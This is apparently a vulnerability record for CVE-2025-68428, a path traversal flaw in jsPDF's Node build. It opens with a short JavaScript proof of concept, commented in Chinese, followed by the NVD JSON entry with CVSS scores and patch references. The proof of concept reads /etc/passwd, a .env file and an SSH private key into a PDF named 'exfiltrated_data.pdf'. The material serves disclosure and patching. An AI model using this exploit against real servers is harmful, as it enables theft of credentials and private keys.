CVE-2025-68428

const { jsPDF } = require('jspdf'); // 创建jsPDF实例 const doc = new jsPDF(); // 漏洞利用：通过路径遍历读取系统文件 // 读取 /etc/passwd 文件 try { doc.loadFile('../../../../etc/passwd'); console.log('Successfully read /etc/passwd'); } catch (error) { console.error('Error:', error.message); } // 读取应用配置文件 try { doc.loadFile('../../../../app/config/.env'); console.log('Successfully read .env file'); } catch (error) { console.error('Error:', error.message); } // 读取SSH私钥 try { doc.loadFile('../../../../home/user/.ssh/id_rsa'); console.log('Successfully read SSH private key'); } catch (error) { console.error('Error:', error.message); } // 保存包含文件内容的PDF doc.save('exfiltrated_data.pdf'); // 修复方案：升级到jsPDF 4.0.0+或使用Node.js权限模式 // const { jsPDF } = require('jspdf'); // const doc = new jsPDF(); // doc.loadFile('./allowed-directory/safe-file.pdf'); // 安全方式

{"cve": {"id": "CVE-2025-68428", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:51.977", "lastModified": "2026-01-16T18:34:24.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are `addImage`, `html`, and `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files. The vulnerability has been fixed in [email protected]. This version restricts file system access per default. This semver-major update does not introduce other breaking changes. Some workarounds areavailable. With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. For older node versions, sanitize user-provided paths before passing them to jsPDF."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-35"}, {"lang": "en", "value": "CWE-73"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.0.0", "matchCriteriaId": "1EED4B66-0CA7-43D9-A73B-505062F90B4D"}]}]}], "references": [{"url": "https://github.com/parallax/jsPDF/commit/a688c8f479929b24a6543b1fa2d6364abb03066d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/parallax/jsPDF/releases/tag/v4.0.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}